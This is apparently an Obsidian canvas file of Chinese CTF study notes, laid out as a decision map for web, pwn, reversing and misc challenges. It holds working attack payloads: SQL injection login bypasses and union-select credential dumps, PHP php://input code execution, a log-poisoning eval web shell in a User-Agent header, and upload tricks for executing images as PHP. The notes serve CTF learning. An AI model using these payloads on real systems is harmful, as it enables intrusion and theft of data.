{
	"nodes":[
		{"id":"8a2ed63bf4f270c1","x":-3197,"y":462,"width":320,"height":721,"type":"file","file":"PHP常用payload.md"},
		{"id":"583be1a0a7897cf8","type":"file","file":"栈溢出.md","x":-12040,"y":1840,"width":640,"height":760},
		{"id":"8434d019e1cb2ed5","type":"text","text":"PHP?","x":-2446,"y":50,"width":250,"height":60},
		{"id":"89bdada7546a41aa","type":"text","text":"密码爆破","x":-3986,"y":239,"width":250,"height":60},
		{"id":"463d74c4a70ae090","type":"text","text":"# 信息收集","x":-3555,"y":229,"width":170,"height":70},
		{"id":"68ff66df177f8d15","type":"text","text":"# 扫端口\n工具：`nmap'","x":-4040,"y":500,"width":250,"height":119},
		{"id":"36d2a7f569b53f1d","type":"text","text":"# SQL伪造查询数据\n\n## 使用 `with rollup` 伪造查询数据\n[[SQL伪造查询记录的字段]]","x":-6306,"y":1675,"width":560,"height":336},
		{"id":"d57b3677cd93029f","type":"text","text":"# SQL注入\n\n## 万能登录密码\n```sql\n1' or 1=1#\n```\n","x":-4957,"y":295,"width":470,"height":420},
		{"id":"7ce30a3646cae31e","type":"text","text":"看起来啥都没有？","x":-3790,"y":80,"width":250,"height":60},
		{"id":"d5e45fbf91e7e6a1","type":"text","text":"# SQL空格绕过\n## 注释绕过空格\n使用 `/**/` 绕过空格","x":-8373,"y":2695,"width":382,"height":223},
		{"id":"7eb6c5177d6598c8","type":"text","text":"空格被ban了？","x":-8043,"y":2366,"width":250,"height":60},
		{"id":"b5cbff30aaff8e9a","type":"text","text":"# SQL 单引号 `'` 绕过\n## 使用十六进制代替\n例如\n```sql\nunion select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag' #\n```\n这样读取没东西\n可以考虑把 `flag` 换成 `0x666c6167`","x":-7911,"y":2695,"width":560,"height":335},
		{"id":"a66768b0462b4bd3","type":"text","text":"单引号 `'` 被ban了？","x":-7685,"y":2366,"width":250,"height":60},
		{"id":"409920349830ca5e","type":"text","text":"是否有WAF？","x":-7424,"y":1804,"width":250,"height":50},
		{"id":"6fcadfcbee1b31ba","type":"text","text":"## SQL`,` 绕过\n`,` 被 ban 了，这意味着大多数函数，例如 `substr` `mid` 没法按照正常的方式使用\n\n## 使用 `from...for` 来截取字符串\n常规：`substr(database(),1,1)`\n\t`substr(string, start, length)`\n非常规（和非常规是等效的）：\n- `substr(database() from 1 for 1)`\n- `mid(database() from 1 for 1)`\n\n## 使用 `offset`\n`limit` 语句通常会用 `,` ，不过可以用 `offset` 代替\n`limit 0,1` 可以改写成 `LIMIT 1 OFFSET 0`\n","x":-7271,"y":2695,"width":440,"height":520},
		{"id":"ee91d3ff741ee22a","type":"text","text":"逗号 `,` 被ban了？","x":-7234,"y":2371,"width":250,"height":60},
		{"id":"112b922442e1dd84","type":"text","text":"`and` 或 `or` 被ban了？","x":-6876,"y":2380,"width":250,"height":60},
		{"id":"ccdab5fa6a9ddf5f","type":"text","text":"# SQL `and` `or` 绕过\n\n## 使用 `&&` 和 `||` 进行替代\n- 使用 `&&` 代替 `AND`（URL 编码为 `%26%26`）。\n    \n- 使用 `||` 代替 `OR`（URL 编码为 `%7c%7c`）。\n## 使用异或 `^` `XOR`\n此方法可以代替 `and`\n- `1^1^1` 为真（页面正常）\n- `1^0^1` 为假（页面异常）","x":-6751,"y":2695,"width":445,"height":402},
		{"id":"2c9325c5dd7ccba4","type":"text","text":"WEB","x":-2880,"y":-640,"width":250,"height":60},
		{"id":"22202fd9b91ca55d","type":"text","text":"# 扫目录、文件\n工具：`dirsearch`","x":-3610,"y":500,"width":281,"height":119},
		{"id":"6cfc2994c1c89fec","type":"text","text":"杂项","x":-7383,"y":-498,"width":250,"height":60},
		{"id":"7b3fd84cec91467c","type":"text","text":"压缩包","x":-7005,"y":-235,"width":250,"height":60},
		{"id":"ff2ac1afa0543cda","type":"text","text":"神秘编码","x":-6264,"y":-235,"width":250,"height":60},
		{"id":"7a76766d86b12b51","type":"text","text":"现有的图片高度之外还藏有其他信息？","x":-7383,"y":-12,"width":250,"height":60},
		{"id":"97a8160ecdc7e9a1","type":"text","text":"伪密码？","x":-7005,"y":-10,"width":250,"height":60},
		{"id":"2595545ea9e14881","type":"text","text":"zip","x":-7255,"y":246,"width":250,"height":60},
		{"id":"943b2c9c5d684b77","type":"text","text":"rar","x":-6965,"y":246,"width":250,"height":60},
		{"id":"b3e5ef3adf333b4e","type":"text","text":"不是伪加密","x":-6675,"y":246,"width":250,"height":60},
		{"id":"41ebcf8ef86ca216","type":"file","file":"zip 伪压缩.md","x":-7333,"y":427,"width":400,"height":400},
		{"id":"5feec210a9668e9d","type":"text","text":"尝试纯数字暴力破解密码","x":-6893,"y":427,"width":250,"height":60},
		{"id":"c4f564c560d3580e","type":"text","text":"是否使用OutGuess进行隐写","x":-8821,"y":-12,"width":250,"height":60},
		{"id":"49ce4a103ac97a82","type":"text","text":"用010editor检查文件末尾","x":-8663,"y":164,"width":250,"height":60},
		{"id":"d5d3c0a05114d8f8","type":"text","text":"图片是否本身原始包含其他文件？","x":-8531,"y":-12,"width":250,"height":60},
		{"id":"2d15dc45806b8594","type":"text","text":"图片","x":-7697,"y":-237,"width":250,"height":60},
		{"id":"fb91f2811bfefcbd","type":"text","text":"是否使用Steghide进行隐写？","x":-7661,"y":-12,"width":250,"height":60},
		{"id":"7b41fd0497d25a3f","type":"text","text":"使用binwalk或foremost检查","x":-8378,"y":164,"width":250,"height":60},
		{"id":"440f52169bb6be27","type":"text","text":"是否进行RGB通道隐写？","x":-8241,"y":-12,"width":250,"height":60},
		{"id":"9fc9f358d244662e","type":"text","text":"是否进行LSB隐写？","x":-7951,"y":-12,"width":250,"height":60},
		{"id":"c63fc4e846cc8003","type":"text","text":"双写绕过","x":-6528,"y":2380,"width":250,"height":60},
		{"id":"d1a8e5bb9d994370","type":"text","text":"# PHP伪协议\n\n## 带编码地读取文件\n```\n?file=php://filter/read=convert.base64-encode/resource=index.php\n```\n\n## 用 `php://input` 来RCE\n原理是 `php://input` 这个协议会从POST请求读取数据，而 `inlcude` 会执行 PHP 代码。\n```\n?url=php://input\n```\n然后 POST 的 body\n```\n<?php system(\"ls\"); ?>\n```","x":-2828,"y":603,"width":460,"height":550},
		{"id":"2e8e441a95e283c9","type":"text","text":"伪协议被 ban 了？","x":-2723,"y":1313,"width":250,"height":60},
		{"id":"a5f51334bf18410a","type":"text","text":"# 日志注入\n\n\n| **服务器/系统**             | **常见日志路径**                                                    |\n| ---------------------- | ------------------------------------------------------------- |\n| **Apache (Ubuntu)**    | `/var/log/apache2/access.log` 或 `error.log`                   |\n| **Apache (CentOS)**    | `/var/log/httpd/access_log`                                   |\n| **Nginx**              | `/var/log/nginx/access.log` 或 `error.log`                     |\n| **SSH (Auth)**         | `/var/log/auth.log` (尝试通过 `ssh '<?php ... ?>'@target.com` 注入) |\n| **Windows (phpStudy)** | `../phpstudy_pro/Extensions/Apache2.4.39/logs/access.log`     |\n\n## Nginx日志写入\nApache 会记录 User-Agent 和 Referer\n[[include 日志注入]]\n\n**通过 User-Agent 注入**\n```http\nGET /?url=/var/log/nginx/access.log HTTP/1.1\nHost: 8f9cf2e7-3f55-4cf2-ace4-01710766c558.challenge.ctf.show\nUser-Agent: <?php @eval($_POST['ant']);die();?>\n```","x":-2957,"y":1490,"width":718,"height":550},
		{"id":"68fb15ef09bbd328","type":"text","text":"有 `include` ？","x":-2723,"y":453,"width":250,"height":60},
		{"id":"31541e3ead504d75","type":"text","text":"# 使用PHP的 `md5(string, true)` 来编码SQL命令\n`md5(string $string, bool $binary = false): string`\n- **参数**\n    - `$string`：要计算哈希值的原始字符串（必需）。\n    - `$binary`：可选参数，默认为 `false`。\n        - `false`：返回 32 字符的十六进制数字字符串。\n        - `true`：返回原始的 16 字节二进制格式。\n- **返回值**\n    - 返回计算出的 MD5 哈希值（通常为 32 位十六进制小写字符串）。\n\n二进制格式，这意味着可能拼凑出恶意字符串\n有一个尤为著名的payload `ffifdybz`\n经过 ","x":-4040,"y":1524,"width":484,"height":640},
		{"id":"4b2cc9a84e2b8b23","type":"text","text":"# 使用PHP的 `md5(string, true)` 来编码SQL命令\n`md5(string $string, bool $binary = false): string`\n- **参数**\n    - `$string`：要计算哈希值的原始字符串（必需）。\n    - `$binary`：可选参数，默认为 `false`。\n        - `false`：返回 32 字符的十六进制数字字符串。\n        - `true`：返回原始的 16 字节二进制格式。\n- **返回值**\n    - 返回计算出的 MD5 哈希值（通常为 32 位十六进制小写字符串）。\n\n```php\n$sql=\"select * from user where username ='admin' and password ='\".md5($password,true).\"'\";\n```\n\n二进制格式，这意味着可能拼凑出恶意字符串\n有一个尤为著名的payload `ffifdyop`\n经过 `md5(string, true)` 之后将得到 `276f722736c95d99e921722cf9ed621c`\n也就是 `'or'6É]é!r,ùíb\u001c`\n\n这样子可以使得后边的条件直接成立","x":-4040,"y":1524,"width":484,"height":640},
		{"id":"6450ba2f5d59ab4d","type":"text","text":"PHP的 `md5` 和SQL组合？","x":-3923,"y":1333,"width":250,"height":60},
		{"id":"b26cff55d14464ac","type":"text","text":"尝试报错注入","x":-4447,"y":1524,"width":250,"height":60},
		{"id":"8ec1734e2aaa4b96","type":"text","text":"尝试布尔注入","x":-5387,"y":1541,"width":250,"height":60},
		{"id":"9e19877d3fb6d430","type":"text","text":"是否有回显？","x":-4847,"y":1303,"width":250,"height":60},
		{"id":"aefd0da46fb7c652","type":"text","text":"# 访问数据库内容\n\n## 查看当前数据库名\n使用 `database()` 函数。\n```sql\n1' union select 1,database(),3 #\n```\n\n## 获取所有表名\n用 `group_concat` 压成一个字符串，从 `information_schema.tables` 查询\n```sql\nunion select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #\n```\n\n## 获取表里的列名\n\n```sql\nunion select 1,group_concat(column_name),3 from information_schema.columns where table_name='<你的表名>' #\n```\n\n## 获取列里的数据\n`0x3a` 是 `:`\n```sql\nunion select 1,group_concat(username,0x3a,password),3 from users #\n```","x":-4996,"y":2341,"width":518,"height":709},
		{"id":"03ede5f3a3be0800","type":"text","text":"# 有回显\n\n## 测试 `select` 的列数\n### 用 `order by` 测试\n```sql\norder by 1 #\n```\n### 用 `union select` 测试\n```sql\nunion select 1 #\nunion select 1,2 #\nunion select 1,2,3 #\n```\n\n## 测试哪个列会回显\n让原查询失效，然后使用 `union select`\n```sql\n1' union select 1,2,3 #\n```  ","x":-4947,"y":1524,"width":420,"height":639},
		{"id":"d17d1913c0b3ed31","type":"text","text":"# 使用运算符进行布尔注入\n使用 `and` `or` `xor` 还有字符截断\n例如 \n```sql\n1 and ascii(substr(database() from 1 for 1)) = 97\n```","x":-5499,"y":1770,"width":474,"height":262},
		{"id":"a63df04fb6e64d0a","type":"file","file":"各种从数据库里获取信息的方法.md","x":-4996,"y":3130,"width":518,"height":570},
		{"id":"a0e0ba82e42a13c5","type":"text","text":"# 根据跨段指令找OEP\n`.pediy` 是外壳区块，正常程序的入口点一般指向 `.text` ，加壳程序加壳后可能会将其改到外壳部分。\n不过这样的话，他最终很可能是要跳回来的，因此可以通过跨段指令来找OEP。\n![[Pasted image 20260412154232.png]]","x":-10480,"y":1104,"width":440,"height":480},
		{"id":"9ba67c3844d16ca8","type":"text","text":"寻找OEP","x":-9936,"y":728,"width":250,"height":60},
		{"id":"ff93a31c86aafb6b","type":"text","text":"# 用内存访问断点找OEP\n手动跟踪跳转到 `.text` 的跨段指令也可以找到 OEP，但其实不必手动跟踪。可以对代码段设置内存访问断点","x":-9860,"y":1104,"width":460,"height":480},
		{"id":"d9094a86f54c2c5c","type":"text","text":"# 壳为什么要保存寄存器的状态？\n当 Windows 加载一个程序时，它并不是把所有寄存器都清零。相反，某些寄存器会被赋予特定的含义。例如：\n- **`EAX`**：通常指向程序的入口点（OEP）。\n- **`EBX`**：在某些 Windows 版本或加载方式下，指向进程环境块（PEB）。\n- **`ESP` 和 `EBP`**：最重要的栈指针。它们决定了程序运行时的栈顶和基址。\n- **其他寄存器**：虽然大部分寄存器在程序启动瞬间可能是随机的或不重要的，但你无法保证编译器生成的初始化代码是否会利用这些“初始值”。\n### 2. “壳”也是一个程序，它会“弄脏”寄存器\n壳程序（Packer）本身就是一段复杂的汇编代码。在它完成解压、解密、修复输入表等任务的过程中，它必须疯狂地使用寄存器：\n- 用 `ECX` 做计数器进行循环。\n- 用 `ESI` 和 `EDI` 进行内存数据的拷贝（解压）。\n- 用 `EAX` 接收 API 函数的返回值。","x":-9400,"y":224,"width":460,"height":670},
		{"id":"6deeae418166bea4","type":"text","text":"# 根据栈平衡原理找OEP","x":-9295,"y":1104,"width":515,"height":480},
		{"id":"6175bc5a4a6c322d","type":"text","text":"脱壳","x":-9936,"y":334,"width":250,"height":60},
		{"id":"95d8f6f0fd4de6c4","type":"file","file":"python 模拟c类型.md","x":-14720,"y":441,"width":480,"height":660},
		{"id":"56149d1f0e77a191","type":"file","file":"python进制转换.md","x":-14132,"y":448,"width":400,"height":653},
		{"id":"c7ba24ac54b96a6e","type":"file","file":"AES加密算法.md","x":-13159,"y":487,"width":400,"height":434},
		{"id":"c87a0da3e0389509","type":"file","file":"RC4加密算法.md","x":-13640,"y":481,"width":380,"height":440},
		{"id":"c03edfbebb5081d5","type":"text","text":"# 工具\n## 二进制程序\n- IDAPRO\n- x64dbg\n## java\n- jadx","x":-12600,"y":447,"width":325,"height":377},
		{"id":"472a67316cd0ad8b","type":"text","text":"脚本编写","x":-14365,"y":207,"width":250,"height":60},
		{"id":"0bf5972a52e5d63d","type":"text","text":"加密算法","x":-13320,"y":247,"width":250,"height":60},
		{"id":"bc5f3345be9bdc22","type":"text","text":"逆向","x":-11520,"y":-80,"width":250,"height":60},
		{"id":"c688ee0a085e90cf","type":"file","file":"花指令.md","x":-12000,"y":464,"width":460,"height":360},
		{"id":"0fbbe31be950e007","type":"text","text":"# 反调试","x":-11251,"y":456,"width":250,"height":60},
		{"id":"c03774d5c4a94f4e","type":"text","text":"PWN","x":-12080,"y":1584,"width":250,"height":60},
		{"id":"6d21a2c675207c37","type":"text","text":"工具","x":-13527,"y":1859,"width":250,"height":60},
		{"id":"37c921ec10c8ca82","type":"text","text":"# 脚本编写\n\n## pwntools API\n| **类别**    | **常用函数**                                      | **功能描述**                             |\n| --------- | --------------------------------------------- | ------------------------------------ |\n| **连接**    | `process(['cmd', 'arg'])`                     | 启动本地进程（或启动 gdbserver）。               |\n|           | `remote('ip', port)`                          | 连接远程题目服务器。                           |\n| **打包/解包** | `p32(0xdeadbeef)`                             | 将整数转换为 4 字节小端字节流（32位）。               |\n|           | `u32(b'AAAA')`                                | 将 4 字节流还原为整数（32位）。                   |\n|           | `flat([...], word_size=32/64)`                | 将多个整数/字节拼接成字节流，自动处理填充与对齐。            |\n| **IO 交互** | `sendline(data)`                              | 发送数据并追加换行符。                          |\n|           | `send(data)`                                  | 发送原始字节流（不自动添加换行）。                    |\n|           | `recv(n)`                                     | 精确接收 `n` 个字节。                        |\n|           | `recvuntil(b'pattern')`                       | 接收数据直到看到特定的字符串（常用于跳过欢迎语）。            |\n|           | `interactive()`                               | **最重要**：将控制权交还给你的键盘，直接与程序对话。         |\n| **工具**    | `cyclic(n)`                                   | 生成长度为 n 的非重复序列，用于定位溢出偏移。             |\n|           | `ELF('./file')`                               | 自动解析文件的函数地址、PLT、GOT 等信息。             |\n| `context` | `context.arch = 'amd64'` / `'i386'` / `'arm'` | 设置目标架构，会影响如 `flat()` 的函数。`i386` 是32位 |\n|           | `context.os = 'linux'` / `'windows'`          | 设置目标操作系统。                            |\n|           | `context.log_level = 'debug'`                 |                                      |\n\n### ELF\n| 属性/方法                                   | 功能描述                                 |\n| --------------------------------------- | ------------------------------------ |\n| `ELF.symbols['sym']` 或 `ELF.sym['sym']` | 获取符号 `sym` 的虚拟地址（如 `main`、`system`）。 |\n| `ELF.plt['func']`                       | 获取函数 `func` 的 PLT 表项地址（用于调用库函数）。     |\n| `ELF.got['func']`                       | 获取函数 `func` 的 GOT 表项地址（常用于泄露地址）。     |\n| `ELF.bss()`                             | 获取 BSS 段的起始地址（存放未初始化全局变量）。           |\n| `ELF.address`                           | ELF 对象的加载基址（当开启 PIE 时可手动设置或自动解析）。    |\n| `ELF.search(b'pattern')`                | 返回一个生成器，在二进制文件中搜索字节序列。               |\n| `ELF.read(addr, size)`                  | 从指定虚拟地址 `addr` 读取 `size` 字节的数据。      |\n| `ELF.write(addr, data)`                 | 将 `data` 写入指定的虚拟地址（修改二进制文件内容）。       |\n| `ELF.dynamic_value_by_tag(tag)`         | 获取动态段中指定标签（如 `DT_STRTAB`）对应的值。       |\n| `ELF.checksec()`                        | 打印该二进制文件的安全保护机制（如 NX、Canary、PIE）。    |\n| `ELF.libc`                              | 若已知 libc 路径，可关联并获取 libc 中的符号地址。      |\n\n## LibcSearcher\n\n| **API 方法**                          | **说明**                                                       | **参数示例**                                      |\n| ----------------------------------- | ------------------------------------------------------------ | --------------------------------------------- |\n| **`LibcSearcher(func_name, addr)`** | **构造函数/搜索**。根据泄露出的函数名及其在内存中的真实绝对地址，匹配 libc 版本。               | `libc = LibcSearcher(\"puts\", 0x7f1234567a60)` |\n| **`dump(symbol_name)`**             | **获取偏移**。在匹配到的 libc 版本中，获取指定符号（函数或字符串）相对于 libc 基址的静态偏移。      | `offset = libc.dump(\"system\")`                |\n| **`add_condition(name, addr)`**     | **添加约束**。如果有多个匹配结果，可以添加另一个已知函数的泄露地址来缩小搜索范围。                  | `libc.add_condition(\"read\", 0x7f1234567b10)`  |\n| **`select_libc(index)`**            | **手动选择**。当匹配到多个 libc 时，可以通过索引直接选择其中一个（如果不调用，脚本运行时会交互式地让你输入）。 | `libc.select_libc(1)`                         |\n`dump()` 常用的符号名 (Symbols)\n\n| **符号名 (Symbol)**          | **说明**                                            |\n| ------------------------- | ------------------------------------------------- |\n| **`\"system\"`**            | `system()` 函数的偏移，用于执行命令。                          |\n| **`\"str_bin_sh\"`**        | **注意：** 库中 `\"/bin/sh\"` 字符串的偏移（LibcSearcher 特有写法）。 |\n| **`\"__libc_start_main\"`** | libc 的初始化函数偏移，常用于泄露和定位。                           |\n| **`\"printf\"` / `\"puts\"`** | 常见的输出函数偏移。                                        |\n| **`\"execve\"`**            | 另一个常用的执行函数偏移。                                     |","x":-13060,"y":1820,"width":840,"height":1260},
		{"id":"35946aef7f040b0a","type":"text","text":"# 没有后门函数？\n\n## 能否自己在栈里面造函数？\n既然没有后门函数，那么我写入的数据是机器代码，然后我再让程序跳到我写的机器代码，这是可行的吗？\n\n现在的程序大多都有 NX (No-Execute) 保护。\n**核心逻辑**：操作系统将内存区域标记为“可写”或“可执行”，但通常不会两者兼有。\n也就是说，就算可以跳到你写的代码，也没有执行权限。\n","x":-11872,"y":3360,"width":380,"height":460},
		{"id":"91eaf9b50bb5111a","type":"file","file":"栈金丝雀（Stack Canary）.md","x":-11195,"y":3386,"width":400,"height":400},
		{"id":"4143fae7b3aa5cdb","type":"file","file":"x64栈对齐.md","x":-12640,"y":3360,"width":518,"height":560},
		{"id":"6e871014a8e5dce7","type":"file","file":"x64在栈对齐的情况下，程序如何执行？.md","x":-13490,"y":3360,"width":460,"height":560},
		{"id":"4b2521464382156b","type":"text","text":"# Ret2libc\n[[无后门 Ret2libc调用system 无PIE保护]]\n\n**libc** 是 **C 标准库（C Standard Library）** 的缩写。在 Linux 下，libc 通常以**动态链接库**的形式存在。\n\n## 确定 `libc` 版本\n\n由于ASLR，库的地址总是改变，但是函数之间的相对地址是不会变的。\n\n一般的程序都会有 `__libc_start_main` ，他是 `libc` 的初始化函数。库函数的基址是**页对齐**的，一页通常来说就是4096字节，也就是说库基址将会是 `0xXXXXX000` 。而函数的相对偏移又是不变的，所以就可以通过地址来确定版本了。\n\n有一个工具可以帮我们识别 `libc` 的版本，他就是 `LibcSearcher`\n","x":-12260,"y":4240,"width":472,"height":542},
		{"id":"3db66f66d3a2bece","type":"text","text":"# 自己造函数\n如果没有 NX 保护的话，这是成立的。","x":-11620,"y":4240,"width":425,"height":360},
		{"id":"d5ae7df1f759da66","type":"text","text":"# **Gadget**（小工具/零件）\n\nGadget 就像是可以自己拼代码一样\n\n一个合格的 Gadget 必须具备两个要素：\n1. **有用的指令**：比如 `pop rdi`（改寄存器）、`add esp, 8`（移动栈顶）、`xor eax, eax`（清零）。\n2. **以 `ret` 结尾**：这是灵魂。没有 `ret`，你的程序执行完这段指令就“跑飞”了，没法交还控制权。\n\n## 对于x64栈溢出来说\n### 用于传参的 Gadget\n[[x64栈溢出 无后门 ret2libc gadget]]\n在 x64 平台，参数可就有很多不是通过栈来传参的了\n因此我们需要这么一个 Gadget：\n```asm\npop rdi;\nret;\n```\n来把东西弄到寄存器那里去\n\n### 用于栈对齐的 Gadget\n在 x64 下，最常用的栈对齐 Gadget 其实就是一个单纯的：\n```asm\nret;\n```","x":-10620,"y":3386,"width":480,"height":814},
		{"id":"eb40edaf418582dd","type":"text","text":"# pwntools cli\n\n\n\n\n| 命令         | 作用          |\n| ---------- | ----------- |\n| `checksec` | 可以检查程序的保护情况 |\n","x":-15000,"y":2049,"width":477,"height":280},
		{"id":"4556a6e2671d4862","type":"file","file":"ROPgadget.md","x":-14415,"y":2050,"width":400,"height":400},
		{"id":"d80813d0fd734d54","type":"file","file":"pwndbg.md","x":-13874,"y":2072,"width":400,"height":400},
		{"id":"151461728bf7daee","type":"file","file":"x64 函数调用约定.md","x":-9889,"y":2024,"width":400,"height":400},
		{"id":"8c454a2ea22b8df4","type":"text","text":"前置知识","x":-10385,"y":1810,"width":250,"height":60},
		{"id":"22f27b0e3b07d2cf","type":"file","file":"ASLR（地址空间布局随机化）.md","x":-10605,"y":2015,"width":640,"height":585},
		{"id":"92a6897b30df7463","type":"file","file":"PWN格式化字符串.md","x":-11320,"y":1840,"width":560,"height":760},
		{"id":"4117d03c66f54e0d","type":"text","text":"要绕过逻辑？","x":-1800,"y":380,"width":250,"height":60},
		{"id":"4f8b3c8d92181859","type":"text","text":"# md5 绕过\n\n## [[php字母和数字 md5弱判断绕过]]\n\n## [[md5碰撞]]\n对于弱判断，可以考虑 `0e`\n对于强判断，可以考虑md5完全相等的，只不过payload有点长","x":-2321,"y":702,"width":459,"height":420},
		{"id":"2a6944261e61f9bc","type":"text","text":"md5?","x":-2217,"y":603,"width":250,"height":60},
		{"id":"2c0f1e45bcb5f702","type":"text","text":"`$_SESSION` ？","x":-1800,"y":603,"width":250,"height":60},
		{"id":"f378c2be90db729a","type":"text","text":"[[PHP令SESSION为空绕过判断]]","x":-1800,"y":753,"width":250,"height":60},
		{"id":"e6b7ddcab933feac","type":"text","text":"## 没写 `break` 还会执行下一条\n[[PHP switch无break 绕information.tables]]","x":-1486,"y":753,"width":340,"height":174},
		{"id":"3ba0d0b64e14a822","type":"text","text":"`switch` ？","x":-1441,"y":603,"width":250,"height":60},
		{"id":"192f3ed6acc26bac","type":"text","text":"WEB服务器","x":1000,"y":50,"width":250,"height":60},
		{"id":"4b25a39c24e7381f","type":"file","file":"NGINX 重要信息.md","x":935,"y":243,"width":380,"height":477},
		{"id":"471fedbc5c7ba65c","type":"text","text":"#  `php.ini` 的 `cgi.fix_pathinfo` 配置不当\n- `php.ini` 是 PHP 的**全局核心配置文件**。每当 PHP 启动（无论是作为 Nginx 的后端 PHP-FPM 运行，还是在命令行执行 PHP 脚本）时，系统都会读取这个文件来决定 PHP 的行为、性能限制和安全规则。\n- `cgi.fix_pathinfo` 的本意是修复错误的路径\n**官方定义**：如果该值为 `1`，PHP 会对文件路径进行递归查询，直到找到存在的文件为止。\n\n## 如果Nginx的配置比较简单\n例如\n```Nginx\nlocation ~ \\.php$ {\n    fastcgi_pass 127.0.0.1:9000;\n    ...\n}\n```\n这会把 `.php` 结尾的路径当成php文件，然后发给 FastCGI 当成php来解释。\n\n这意味着，你上传一张图片然后访问\n`/upload/shell.jpg/.php`\n就可以执行你上传的代码\n","x":-160,"y":243,"width":440,"height":677},
		{"id":"3421040d56f3f4f5","type":"text","text":"可上传文件？","x":-65,"y":50,"width":250,"height":60},
		{"id":"5519f86f5386a80c","type":"text","text":"# 上传 `.user.ini`\n简单来说，`.user.ini` 是 PHP 的一种**“分布式配置文件”**。\n它的核心作用是让用户可以在**特定的目录**下，自定义该目录及其子目录的 PHP 配置，而无需修改全局的 `php.ini`。\n\n一般只有 NGINX + PHP-FPM 这种运行模式才可以用这个配置，这个模式下，php解释器是作为独立进程运行的。\n\n## 常见的`.user.ini`payload\n\n```ini\nauto_prepend_file=shell.jpg\n```\n---\n[[通过上传 .user.ini 配置文件来执行上传的文件]]","x":460,"y":243,"width":360,"height":590},
		{"id":"89161e2096157135","type":"text","text":"上传后文件名保持不变？","x":515,"y":50,"width":250,"height":60},
		{"id":"f7813b20b0fdd9fb","x":-840,"y":50,"width":250,"height":60,"type":"text","text":"远程执行"}
	],
	"edges":[
		{"id":"62f15c22923a3367","fromNode":"6cfc2994c1c89fec","fromSide":"bottom","toNode":"2d15dc45806b8594","toSide":"top"},
		{"id":"0e4ccb8549a9d711","fromNode":"2d15dc45806b8594","fromSide":"bottom","toNode":"d5d3c0a05114d8f8","toSide":"top"},
		{"id":"e0b70a1e142412f4","fromNode":"2d15dc45806b8594","fromSide":"bottom","toNode":"440f52169bb6be27","toSide":"top"},
		{"id":"be9025fdf448ee25","fromNode":"2d15dc45806b8594","fromSide":"bottom","toNode":"fb91f2811bfefcbd","toSide":"top"},
		{"id":"49579b2439948aca","fromNode":"d5d3c0a05114d8f8","fromSide":"bottom","toNode":"49ce4a103ac97a82","toSide":"top"},
		{"id":"d86f581fd4789749","fromNode":"d5d3c0a05114d8f8","fromSide":"bottom","toNode":"7b41fd0497d25a3f","toSide":"top"},
		{"id":"e3b5a7213ba14ae2","fromNode":"2d15dc45806b8594","fromSide":"bottom","toNode":"c4f564c560d3580e","toSide":"top"},
		{"id":"5705b0f6b7bab645","fromNode":"6cfc2994c1c89fec","fromSide":"bottom","toNode":"7b3fd84cec91467c","toSide":"top"},
		{"id":"2e11dd29d41b5e52","fromNode":"2d15dc45806b8594","fromSide":"bottom","toNode":"7a76766d86b12b51","toSide":"top"},
		{"id":"fc2b623f7f156d3d","fromNode":"7b3fd84cec91467c","fromSide":"bottom","toNode":"97a8160ecdc7e9a1","toSide":"top"},
		{"id":"25df2dde53c11f9b","fromNode":"97a8160ecdc7e9a1","fromSide":"bottom","toNode":"2595545ea9e14881","toSide":"top"},
		{"id":"1ee481ada1f7b4d2","fromNode":"97a8160ecdc7e9a1","fromSide":"bottom","toNode":"943b2c9c5d684b77","toSide":"top"},
		{"id":"18cb50c83d632da4","fromNode":"2595545ea9e14881","fromSide":"bottom","toNode":"41ebcf8ef86ca216","toSide":"top"},
		{"id":"83122d916aa44ceb","fromNode":"b3e5ef3adf333b4e","fromSide":"bottom","toNode":"5feec210a9668e9d","toSide":"top"},
		{"id":"3c36bc44fdb08135","fromNode":"6cfc2994c1c89fec","fromSide":"bottom","toNode":"ff2ac1afa0543cda","toSide":"top"},
		{"id":"0521423fd36be0cd","fromNode":"97a8160ecdc7e9a1","fromSide":"bottom","toNode":"b3e5ef3adf333b4e","toSide":"top"},
		{"id":"b9a4a31304066578","fromNode":"2c9325c5dd7ccba4","fromSide":"bottom","toNode":"d57b3677cd93029f","toSide":"top","label":"涉及数据库操作？"},
		{"id":"c53d44ac2332c6e3","fromNode":"d57b3677cd93029f","fromSide":"bottom","toNode":"409920349830ca5e","toSide":"top"},
		{"id":"fcac12961069ce98","fromNode":"d57b3677cd93029f","fromSide":"bottom","toNode":"9e19877d3fb6d430","toSide":"top"},
		{"id":"e121849cb448eb40","fromNode":"9e19877d3fb6d430","fromSide":"bottom","toNode":"b26cff55d14464ac","toSide":"top","label":"没有直接回显"},
		{"id":"41aab72fa2bfb787","fromNode":"9e19877d3fb6d430","fromSide":"bottom","toNode":"8ec1734e2aaa4b96","toSide":"top","label":"只有二值化回显"},
		{"id":"4db3d4861cf499d1","fromNode":"409920349830ca5e","fromSide":"bottom","toNode":"c63fc4e846cc8003","toSide":"top","label":"简单的一次替换？"},
		{"id":"061f173b2e862371","fromNode":"409920349830ca5e","fromSide":"bottom","toNode":"7eb6c5177d6598c8","toSide":"top"},
		{"id":"6a513178655d49df","fromNode":"9e19877d3fb6d430","fromSide":"bottom","toNode":"03ede5f3a3be0800","toSide":"top"},
		{"id":"34b68a9be816ed57","fromNode":"03ede5f3a3be0800","fromSide":"bottom","toNode":"aefd0da46fb7c652","toSide":"top"},
		{"id":"fa28f0c8b8f1ab78","fromNode":"7eb6c5177d6598c8","fromSide":"bottom","toNode":"d5e45fbf91e7e6a1","toSide":"top"},
		{"id":"5e8a7388d4830728","fromNode":"2c9325c5dd7ccba4","fromSide":"bottom","toNode":"8434d019e1cb2ed5","toSide":"top"},
		{"id":"9ac4d62b1ec4b8cb","fromNode":"68fb15ef09bbd328","fromSide":"bottom","toNode":"d1a8e5bb9d994370","toSide":"top"},
		{"id":"bb9bcd487afa9972","fromNode":"d1a8e5bb9d994370","fromSide":"bottom","toNode":"2e8e441a95e283c9","toSide":"top"},
		{"id":"ab1e6a816a412065","fromNode":"2e8e441a95e283c9","fromSide":"bottom","toNode":"a5f51334bf18410a","toSide":"top"},
		{"id":"e8e11f4c55c5e81a","fromNode":"409920349830ca5e","fromSide":"bottom","toNode":"a66768b0462b4bd3","toSide":"top"},
		{"id":"c0aee5b57388f450","fromNode":"a66768b0462b4bd3","fromSide":"bottom","toNode":"b5cbff30aaff8e9a","toSide":"top"},
		{"id":"a0da15eb51ae1be7","fromNode":"409920349830ca5e","fromSide":"bottom","toNode":"ee91d3ff741ee22a","toSide":"top"},
